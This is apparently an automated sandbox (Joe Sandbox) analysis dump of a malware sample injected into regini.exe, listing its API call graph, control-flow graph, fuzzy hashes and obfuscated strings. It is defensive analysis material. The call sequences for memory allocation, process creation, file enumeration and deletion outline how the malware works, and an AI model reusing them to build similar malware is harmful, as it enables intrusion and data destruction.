28d1351 79510->79495 79512 28dc896 79511->79512 79513 28dc890 79511->79513 79514 28db8c0 RtlAllocateHeap 79512->79514 79513->79494 79515 28dc8bc 79514->79515 79515->79494 79517 28dc920 79516->79517 79518 28dc97d 79517->79518 79519 28db8c0 RtlAllocateHeap 79517->79519 79518->79498 79520 28dc95a 79519->79520 79521 28db7e0 RtlFreeHeap 79520->79521 79521->79518 79536 28d9970 79522->79536 79526 28c82c3 79525->79526 79541 28d8bf0 79526->79541 79528 28c82ee 79528->79500 79532 28d9840 79529->79532 79531 28db781 79531->79510 79533 28d986e 79532->79533 79534 28d98d8 79532->79534 79533->79531 79535 28d98ee NtAllocateVirtualMemory 79534->79535 79535->79531 79537 28d998a 79536->79537 79540 3072c70 LdrInitializeThunk 79537->79540 79538 28c09f2 79538->79502 79540->79538 79542 28d8c1e 79541->79542 79543 28d8c71 79541->79543 79542->79528 79546 3072dd0 LdrInitializeThunk 79543->79546 79544 28d8c96 79544->79528 79546->79544 79547 28c72d0 79548 28c72ec 79547->79548 79550 28c733f 79547->79550 79549 28d96d0 NtClose 79548->79549 79548->79550 79551 28c7307 79549->79551 79556 28c7477 79550->79556 79558 28c66f0 NtClose LdrInitializeThunk LdrInitializeThunk 79550->79558 79557 28c66f0 NtClose LdrInitializeThunk LdrInitializeThunk 79551->79557 79553 28c7451 79553->79556 79559 28c68c0 NtClose LdrInitializeThunk LdrInitializeThunk 79553->79559 79557->79550 79558->79553 79559->79556 79560 28caf10 79565 28cac20 79560->79565 79562 28caf1d 79579 28ca890 79562->79579 79564 28caf39 79566 28cac45 79565->79566 79590 28c8520 79566->79590 79569 28cad90 79569->79562 79571 28cada7 79571->79562 79572 28cad9e 79572->79571 79574 28cae95 79572->79574 79609 28ca2e0 79572->79609 79575 28caefa 79574->79575 79618 28ca650 79574->79618 79577 28db7e0 RtlFreeHeap 79575->79577 79578 28caf01 79577->79578 79578->79562 79580 28ca8a6 79579->79580 79583 28ca8b1 79579->79583 79581 28db8c0 RtlAllocateHeap 79580->79581 79580->79583 79581->79583 79582 28ca8d8 79582->79564 79583->79582 79584 28c8520 GetFileAttributesW 
79583->79584 79585 28cabf2 79583->79585 79588 28ca2e0 RtlFreeHeap 79583->79588 79589 28ca650 RtlFreeHeap 79583->79589 79584->79583 79586 28cac0b 79585->79586 79587 28db7e0 RtlFreeHeap 79585->79587 79586->79564 79587->79586 79588->79583 79589->79583 79591 28c8541 79590->79591 79592 28c8553 79591->79592 79593 28c8548 GetFileAttributesW 79591->79593 79592->79569 79594 28d3540 79592->79594 79593->79592 79595 28d354e 79594->79595 79596 28d3555 79594->79596 79595->79572 79597 28c46e0 2 API calls 79596->79597 79598 28d358a 79597->79598 79599 28d3599 79598->79599 79622 28d3000 LdrLoadDll LdrLoadDll 79598->79622 79601 28db8c0 RtlAllocateHeap 79599->79601 79605 28d3744 79599->79605 79602 28d35b2 79601->79602 79603 28d373a 79602->79603 79602->79605 79606 28d35ce 79602->79606 79604 28db7e0 RtlFreeHeap 79603->79604 79603->79605 79604->79605 79605->79572 79606->79605 79607 28db7e0 RtlFreeHeap 79606->79607 79608 28d372e 79607->79608 79608->79572 79610 28ca306 79609->79610 79623 28cdd20 79610->79623 79612 28ca378 79614 28ca396 79612->79614 79615 28ca500 79612->79615 79613 28ca4e5 79613->79572 79614->79613 79628 28ca1a0 79614->79628 79615->79613 79616 28ca1a0 RtlFreeHeap 79615->79616 79616->79615 79619 28ca676 79618->79619 79620 28cdd20 RtlFreeHeap 79619->79620 79621 28ca6fd 79620->79621 79621->79574 79622->79599 79625 28cdd44 79623->79625 79624 28cdd51 79624->79612 79625->79624 79626 28db7e0 RtlFreeHeap 79625->79626 79627 28cdd94 79626->79627 79627->79612 79629 28ca1bd 79628->79629 79632 28cddb0 79629->79632 79631 28ca2c3 79631->79614 79633 28cddd4 79632->79633 79634 28cde7e 79633->79634 79635 28db7e0 RtlFreeHeap 79633->79635 79634->79631 79635->79634 79641 28db4d0 79642 28db4db 79641->79642 79644 28db4fa 79642->79644 79645 28d5ce0 79642->79645 79646 28d5d42 79645->79646 79648 28d5d4f 79646->79648 79649 28c2490 79646->79649 79648->79644 79650 28c2436 79649->79650 79650->79649 79651 28d8cf0 LdrInitializeThunk 79650->79651 79652 28c24c0 79650->79652 79653 28c2466 79651->79653 79656 
28d9770 79653->79656 79655 28c247b 79655->79648 79657 28d9802 79656->79657 79659 28d979e 79656->79659 79661 3072e80 LdrInitializeThunk 79657->79661 79658 28d9833 79658->79655 79659->79655 79661->79658 79662 28d6f50 79663 28d6fb4 79662->79663 79664 28d6fdf 79663->79664 79667 28d0c70 79663->79667 79666 28d6fc1 79668 28d0c89 79667->79668 79670 28d0a20 79667->79670 79668->79666 79669 28d0c5c 79669->79666 79670->79669 79671 28c6570 LdrInitializeThunk 79670->79671 79672 28d9170 LdrInitializeThunk 79670->79672 79673 28d96d0 NtClose 79670->79673 79671->79670 79672->79670 79673->79670 79674 28c3293 79675 28c7f30 2 API calls 79674->79675 79676 28c32a3 79675->79676 79677 28c32bf 79676->79677 79678 28d96d0 NtClose 79676->79678 79678->79677 79679 28c5dd3 79680 28c5d5f 79679->79680 79681 28c5ddf 79679->79681 79682 28c82b0 LdrInitializeThunk 79680->79682 79683 28c5d80 79682->79683 79685 28c5dca 79683->79685 79686 28c5dac 79683->79686 79687 28c8230 79683->79687 79688 28c8274 79687->79688 79689 28c8295 79688->79689 79694 28d89c0 79688->79694 79689->79683 79691 28c8285 79692 28c82a1 79691->79692 79693 28d96d0 NtClose 79691->79693 79692->79683 79693->79689 79695 28d8a3d 79694->79695 79696 28d89eb 79694->79696 79699 3074650 LdrInitializeThunk 79695->79699 79696->79691 79697 28d8a62 79697->79691 79699->79697 79702 28bb6a0 79703 28bcd11 79702->79703 79704 28db750 NtAllocateVirtualMemory 79702->79704 79704->79703 79705 28cfa20 79706 28cfa84 79705->79706 79707 28c6460 2 API calls 79706->79707 79709 28cfbb7 79707->79709 79708 28cfbbe 79709->79708 79734 28c6570 79709->79734 79711 28cfd63 79712 28cfc3a 79712->79711 79713 28cfd72 79712->79713 79738 28cf800 79712->79738 79714 28d96d0 NtClose 79713->79714 79716 28cfd7c 79714->79716 79717 28cfc76 79717->79713 79718 28cfc81 79717->79718 79719 28db8c0 RtlAllocateHeap 79718->79719 79720 28cfcaa 79719->79720 79721 28cfcc9 79720->79721 79722 28cfcb3 79720->79722 79747 28cf6f0 CoInitialize 79721->79747 79724 28d96d0 NtClose 79722->79724 79726 28cfcbd 
79724->79726 79725 28cfcd7 79750 28d9170 79725->79750 79728 28cfd52 79729 28d96d0 NtClose 79728->79729 79730 28cfd5c 79729->79730 79731 28db7e0 RtlFreeHeap 79730->79731 79731->79711 79732 28cfcf5 79732->79728 79733 28d9170 LdrInitializeThunk 79732->79733 79733->79732 79735 28c6595 79734->79735 79754 28d9010 79735->79754 79739 28cf81c 79738->79739 79740 28c46e0 2 API calls 79739->79740 79742 28cf83a 79740->79742 79741 28cf843 79741->79717 79742->79741 79743 28c46e0 2 API calls 79742->79743 79744 28cf90e 79743->79744 79745 28c46e0 2 API calls 79744->79745 79746 28cf968 79744->79746 79745->79746 79746->79717 79748 28cf755 79747->79748 79749 28cf7eb CoUninitialize 79748->79749 79749->79725 79751 28d918d 79750->79751 79759 3072ba0 LdrInitializeThunk 79751->79759 79752 28d91bd 79752->79732 79755 28d902d 79754->79755 79758 3072c60 LdrInitializeThunk 79755->79758 79756 28c6609 79756->79712 79758->79756 79759->79752 79760 28d8ca0 79761 28d8cbd 79760->79761 79764 3072df0 LdrInitializeThunk 79761->79764 79762 28d8ce5 79764->79762 79765 28dc8e0 79766 28db7e0 RtlFreeHeap 79765->79766 79767 28dc8f5 79766->79767 79768 28d9620 79769 28d969a 79768->79769 79771 28d964e 79768->79771 79770 28d96b0 NtDeleteFile 79769->79770 79772 28d6260 79773 28d62ba 79772->79773 79775 28d62c7 79773->79775 79776 28d3c70 79773->79776 79777 28db750 NtAllocateVirtualMemory 79776->79777 79778 28d3cb1 79777->79778 79779 28c46e0 2 API calls 79778->79779 79782 28d3dbe 79778->79782 79780 28d3cf7 79779->79780 79781 28d3d40 Sleep 79780->79781 79780->79782 79781->79780 79782->79775 79783 28d0320 79784 28d033d 79783->79784 79785 28c46e0 2 API calls 79784->79785 79786 28d035b 79785->79786 79787 28d1960 79788 28d197c 79787->79788 79789 28d19b8 79788->79789 79790 28d19a4 79788->79790 79791 28d96d0 NtClose 79789->79791 79792 28d96d0 NtClose 79790->79792 79793 28d19c1 79791->79793 79794 28d19ad 79792->79794 79797 28db900 RtlAllocateHeap 79793->79797 79796 28d19cc 79797->79796 79798 28d9520 79799 28d95ca 79798->79799 
79801 28d954e 79798->79801 79800 28d95e0 NtReadFile 79799->79800 79802 28d8b20 79803 28d8baf 79802->79803 79804 28d8b4b 79802->79804 79807 3072ee0 LdrInitializeThunk 79803->79807 79805 28d8be0 79807->79805 79809 28b9eb0 79810 28b9ebf 79809->79810 79811 28b9f00 79810->79811 79812 28b9eed CreateThread 79810->79812 79813 28c74b0 79814 28c74c8 79813->79814 79816 28c7522 79813->79816 79814->79816 79817 28cb440 79814->79817 79818 28cb466 79817->79818 79819 28cb69c 79818->79819 79844 28d9af0 79818->79844 79819->79816 79821 28cb4e2 79821->79819 79822 28dc9b0 2 API calls 79821->79822 79823 28cb4fe 79822->79823 79823->79819 79824 28cb5d5 79823->79824 79825 28d8cf0 LdrInitializeThunk 79823->79825 79826 28c5cd0 LdrInitializeThunk 79824->79826 79828 28cb5f4 79824->79828 79827 28cb560 79825->79827 79826->79828 79827->79824 79831 28cb569 79827->79831 79832 28cb684 79828->79832 79851 28d8860 79828->79851 79829 28cb5bd 79833 28c82b0 LdrInitializeThunk 79829->79833 79830 28cb59b 79866 28d4970 LdrInitializeThunk 79830->79866 79831->79819 79831->79829 79831->79830 79847 28c5cd0 79831->79847 79838 28c82b0 LdrInitializeThunk 79832->79838 79837 28cb5cb 79833->79837 79837->79816 79839 28cb692 79838->79839 79839->79816 79840 28cb65b 79856 28d8910 79840->79856 79842 28cb675 79861 28d8a70 79842->79861 79845 28d9b0a 79844->79845 79846 28d9b1b CreateProcessInternalW 79845->79846 79846->79821 79848 28c5cdf 79847->79848 79867 28d8ec0 79848->79867 79850 28c5d0e 79850->79830 79852 28d88e0 79851->79852 79853 28d888e 79851->79853 79873 30739b0 LdrInitializeThunk 79852->79873 79853->79840 79854 28d8905 79854->79840 79857 28d898d 79856->79857 79858 28d893b 79856->79858 79874 3074340 LdrInitializeThunk 79857->79874 79858->79842 79859 28d89b2 79859->79842 79862 28d8af0 79861->79862 79864 28d8a9e 79861->79864 79875 3072fb0 LdrInitializeThunk 79862->79875 79863 28d8b15 79863->79832 79864->79832 79866->79829 79868 28d8f74 79867->79868 79870 28d8ef2 79867->79870 79872 3072d10 LdrInitializeThunk 79868->79872 
79869 28d8fb9 79869->79850 79870->79850 79872->79869 79873->79854 79874->79859 79875->79863 79876 28cc7b0 79878 28cc7d9 79876->79878 79877 28cc8dd 79878->79877 79879 28cc883 FindFirstFileW 79878->79879 79879->79877 79881 28cc89e 79879->79881 79880 28cc8c4 FindNextFileW 79880->79881 79882 28cc8d6 FindClose 79880->79882 79881->79880 79882->79877 79883 28c6f30 79884 28c6f5a 79883->79884 79887 28c80e0 79884->79887 79886 28c6f84 79888 28c80fd 79887->79888 79894 28d8de0 79888->79894 79890 28c814d 79891 28c8154 79890->79891 79892 28d8ec0 LdrInitializeThunk 79890->79892 79891->79886 79893 28c817d 79892->79893 79893->79886 79895 28d8e7e 79894->79895 79896 28d8e0e 79894->79896 79899 3072f30 LdrInitializeThunk 79895->79899 79896->79890 79897 28d8eb7 79897->79890 79899->79897 79900 28c0f30 79901 28c0f4a 79900->79901 79902 28c46e0 2 API calls 79901->79902 79903 28c0f68 79901->79903 79902->79903 79904 28c0f9c PostThreadMessageW 79903->79904 79905 28c0fad 79903->79905 79904->79905 79906 28d1cf0 79907 28d1d09 79906->79907 79908 28d1d54 79907->79908 79911 28d1d94 79907->79911 79913 28d1d99 79907->79913 79909 28db7e0 RtlFreeHeap 79908->79909 79910 28d1d64 79909->79910 79912 28db7e0 RtlFreeHeap 79911->79912 79912->79913 79914 28d93b0 79915 28d946a 79914->79915 79916 28d93e2 79914->79916 79917 28d9480 NtCreateFile 79915->79917

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 29 28b9f10-28ba1c0 30 28ba1ca-28ba1da 29->30 30->30 31 28ba1dc-28ba1f4 30->31 32 28ba205-28ba20f 31->32 33 28ba263-28ba26d 32->33 34 28ba211-28ba261 32->34 35 28ba27e-28ba28a 33->35 34->32 37 28ba29d-28ba2b6 35->37 38 28ba28c-28ba29b 35->38 37->37 40 28ba2b8-28ba2d1 37->40 38->35 40->40 41 28ba2d3-28ba2da 40->41 42 28ba2ff-28ba310 41->42 43 28ba2dc-28ba2f2 41->43 46 28ba321-28ba32d 42->46 44 28ba2fd 43->44 45 28ba2f4-28ba2fa 43->45 44->41 45->44 47 28ba32f-28ba33e 46->47 48 28ba340-28ba347 46->48 47->46 50 28ba379-28ba382 48->50 51 28ba349-28ba377 48->51 52 28ba51a-28ba524 50->52 53 28ba388-28ba39b 50->53 51->48 55 28ba535-28ba53e 52->55 54 28ba3ac-28ba3b8 53->54 56 28ba3ba-28ba3cd 54->56 57 28ba3cf-28ba3de 54->57 58 28ba54e-28ba558 55->58 59 28ba540-28ba54c 55->59 56->54 60 28ba44a-28ba454 57->60 61 28ba3e0-28ba3ec 57->61 63 28ba569-28ba572 58->63 59->55 69 28ba465-28ba471 60->69 67 28ba40b-28ba412 61->67 68 28ba3ee-28ba409 61->68 65 28ba585-28ba58c 63->65 66 28ba574-28ba583 63->66 70 28ba5bf-28ba5c9 65->70 71 28ba58e-28ba595 65->71 66->63 73 28ba445 67->73 74 28ba414-28ba443 67->74 68->61 75 28ba493-28ba49d 69->75 76 28ba473-28ba480 69->76 80 28ba5da-28ba5e6 70->80 78 28ba5ba call 28db440 71->78 79 28ba597-28ba5ad 71->79 73->52 74->67 77 28ba4ae-28ba4b7 75->77 81 28ba482-28ba48b 76->81 82 28ba491 76->82 84 28ba4b9-28ba4cc 77->84 85 28ba4ce-28ba4d4 77->85 78->70 86 28ba5b8 79->86 87 28ba5af-28ba5b5 79->87 89 28ba5e8-28ba5f4 80->89 90 28ba604-28ba60e 80->90 81->82 82->69 84->77 93 28ba4d8-28ba4e2 85->93 86->71 87->86 95 28ba602 89->95 96 28ba5f6-28ba5fc 89->96 91 28ba65a-28ba663 90->91 92 28ba610-28ba62f 90->92 97 28ba641-28ba652 92->97 98 28ba631-28ba63f 92->98 99 28ba515 93->99 100 28ba4e4-28ba503 93->100 95->80 96->95 102 28ba658 97->102 98->102 99->50 103 28ba513 100->103 104 28ba505-28ba50d 100->104 102->90 103->93 104->103
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 1$1e$5$C$F$G$Gx$I^$Jv$V$Xg$]@$aY$c$e$l$oL$x2$z$D$X$}
                                                                              • API String ID: 0-2409101627
                                                                              • Opcode ID: dc9542034efb73785b3ef9ef1054dd012fcf2978995625c0d4a0e5f1355190ba
                                                                              • Instruction ID: 435b8bef44401753419f556a6b5706fb7f84b6f6a71863cc5e14a61639b722ea
                                                                              • Opcode Fuzzy Hash: dc9542034efb73785b3ef9ef1054dd012fcf2978995625c0d4a0e5f1355190ba
                                                                              • Instruction Fuzzy Hash: F1128DB8D05229CBDB69CF88C8947DDBBB2BF44308F1081DAC509AB340DB755A89CF55
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 028CC894
                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 028CC8CF
                                                                              • FindClose.KERNELBASE(?), ref: 028CC8DA
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNext
                                                                              • String ID:
                                                                              • API String ID: 3541575487-0
                                                                              • Opcode ID: 7e99e61d1f43b271cb12bed77c676ce7e10fe6c5edc95e166f12a7545896e1cf
                                                                              • Instruction ID: 7df93731b0e3e93082a7b63e416980a108e40b1b03ace0cdc5fe939d31f3347e
                                                                              • Opcode Fuzzy Hash: 7e99e61d1f43b271cb12bed77c676ce7e10fe6c5edc95e166f12a7545896e1cf
                                                                              • Instruction Fuzzy Hash: D1316E79A00208BBDB20DBA4CC85FEF777DEF44744F14449DB90DE6180D770AA848BA1
                                                                              APIs
                                                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 028D94B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: bdc28f7b65c3cdd930017ff862381c90ad356ace6833aa718188b513bd1064a1
                                                                              • Instruction ID: 3c64eef4bb037b03f0bac3ae82675b7fb7016e1aeb7e86ac7733286fe6567557
                                                                              • Opcode Fuzzy Hash: bdc28f7b65c3cdd930017ff862381c90ad356ace6833aa718188b513bd1064a1
                                                                              • Instruction Fuzzy Hash: 0E31D6B9A01608AFCB14DF98D880EDE77F9EF8C314F108219F918A7340D730A9558FA5
                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(028C1F1E,?,028D819F,00000000,00000004,00003000,?,?,?,?,?,028D819F,028C1F1E,00000000,?,028D819F), ref: 028D990B
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: 20ee0b1367dbea7ab7f64ace039bf5eb32452cb9eb1f7f23a46f57acb9cb4484
                                                                              • Instruction ID: 9e08f8e585f7c533361c3054cb46b5d6e1a52139c0878a0b19effba3db06244b
                                                                              • Opcode Fuzzy Hash: 20ee0b1367dbea7ab7f64ace039bf5eb32452cb9eb1f7f23a46f57acb9cb4484
                                                                              • Instruction Fuzzy Hash: 2A212BB9A00209AFDB14DF98DC81EEFB7B9EF88310F108509FD18A7340D770A9158BA5
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteFile
                                                                              • String ID:
                                                                              • API String ID: 4033686569-0
                                                                              • Opcode ID: abf5a842f463631de45dd5feb0bf890711c78a46f63e77bb229b6bfd9453d75b
                                                                              • Instruction ID: 3d4f058fbfb52ad8c8ef47a2c2c2d8dc219c9947058f6992e132fc0c73de0058
                                                                              • Opcode Fuzzy Hash: abf5a842f463631de45dd5feb0bf890711c78a46f63e77bb229b6bfd9453d75b
                                                                              • Instruction Fuzzy Hash: E711A37D6002047BD620EB68CC41FEB73ADDF85314F108549F918A7280D7707A068BA6
                                                                              APIs
                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 028D9704
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 46584140032555b5b69e47656707a814a80bac78df92ade9faa821afa92411cb
                                                                              • Instruction ID: be3ae28071d0b44d3058f0c5f34637aa794a8ab11b0abbde8f71d209eeaf9ad1
                                                                              • Opcode Fuzzy Hash: 46584140032555b5b69e47656707a814a80bac78df92ade9faa821afa92411cb
                                                                              • Instruction Fuzzy Hash: CDE0463A2006047BC620EA59DC01F9B77ADDFC5714F108019FA1CAB280C671B9158AB5
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 5aff11b2c8bfe41281b9b94079535e458086ec5ba879a78feb8cd395cf8a732d
                                                                              • Instruction ID: 01ba5f7c146adeb67287544d76bdd6a3efb55f0173ed54f7b3041f7c1017800d
                                                                              • Opcode Fuzzy Hash: 5aff11b2c8bfe41281b9b94079535e458086ec5ba879a78feb8cd395cf8a732d
                                                                              • Instruction Fuzzy Hash: EB90023160680412A140B25888C4586404697E0301B95C011E0824558C8B148A565361
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 14ed5325b8dbeb6e0d777e801b34c7d60feed6bd491ab4d617d6089b64f3d88a
                                                                              • Instruction ID: 31c4487d3d9f160c0566974e884df66fb97e06aef162cd4979ea005641b483ea
                                                                              • Opcode Fuzzy Hash: 14ed5325b8dbeb6e0d777e801b34c7d60feed6bd491ab4d617d6089b64f3d88a
                                                                              • Instruction Fuzzy Hash: 3C900261602504425140B2588844446604697E13013D5C115A0954564C871889559269
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 467e976f46e37073f495828fbb8c46a225d948725581b2d38fed6297dcbcc567
                                                                              • Instruction ID: 4fb367fa3e6d522a34980a98d149cddb88a1beb4535a50ecc5817c63b3a8f904
                                                                              • Opcode Fuzzy Hash: 467e976f46e37073f495828fbb8c46a225d948725581b2d38fed6297dcbcc567
                                                                              • Instruction Fuzzy Hash: BF90023160650802E100B2588554746104687D0301FA5C411A082456CD87958A5165A2
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: c2864eb0aa40ae442fafd955dad36e1b12e8194d0df41917ff58320859b5bae4
                                                                              • Instruction ID: a2e36d66a1929a559374efda2c289cd63c9344a5a9e14ef8da73e41d35bde325
                                                                              • Opcode Fuzzy Hash: c2864eb0aa40ae442fafd955dad36e1b12e8194d0df41917ff58320859b5bae4
                                                                              • Instruction Fuzzy Hash: CC900261203404035105B2588454656404B87E0301B95C021E1414594DC62589916125
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: fab693e33a595e6f9a93738cbed6d909b737bc8dc3323eaba215097a2c04f2e4
                                                                              • Instruction ID: ce895da96dbeacc49fe7a3c7f0bac4081e15daec10a300372ab21e5252573c09
                                                                              • Opcode Fuzzy Hash: fab693e33a595e6f9a93738cbed6d909b737bc8dc3323eaba215097a2c04f2e4
                                                                              • Instruction Fuzzy Hash: 4790023160640C02E150B2588454786004687D0301F95C011A0424658D87558B5576A1
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 0ce42a06625f11c05117fce9047302c0c86125f4c55c9570ab75b2d8a553bcdc
                                                                              • Instruction ID: 255c6646a32e1e43b1bb9576642367f3a175ad6cd3d5e5a7799d590c98329b94
                                                                              • Opcode Fuzzy Hash: 0ce42a06625f11c05117fce9047302c0c86125f4c55c9570ab75b2d8a553bcdc
                                                                              • Instruction Fuzzy Hash: A290023120644C42E140B2588444A86005687D0305F95C011A0464698D97258E55B661
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: d2ecd73aa1907b577acb52217f195f2fd39b1b1382e17cea329659f9e51632c7
                                                                              • Instruction ID: 3c6f16fb4803e66306a919d02b0ed0964663dd0b229da0ff1e2f2945a35aba23
                                                                              • Opcode Fuzzy Hash: d2ecd73aa1907b577acb52217f195f2fd39b1b1382e17cea329659f9e51632c7
                                                                              • Instruction Fuzzy Hash: F390023120240C02E180B258844468A004687D1301FD5C015A0425658DCB158B5977A1
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
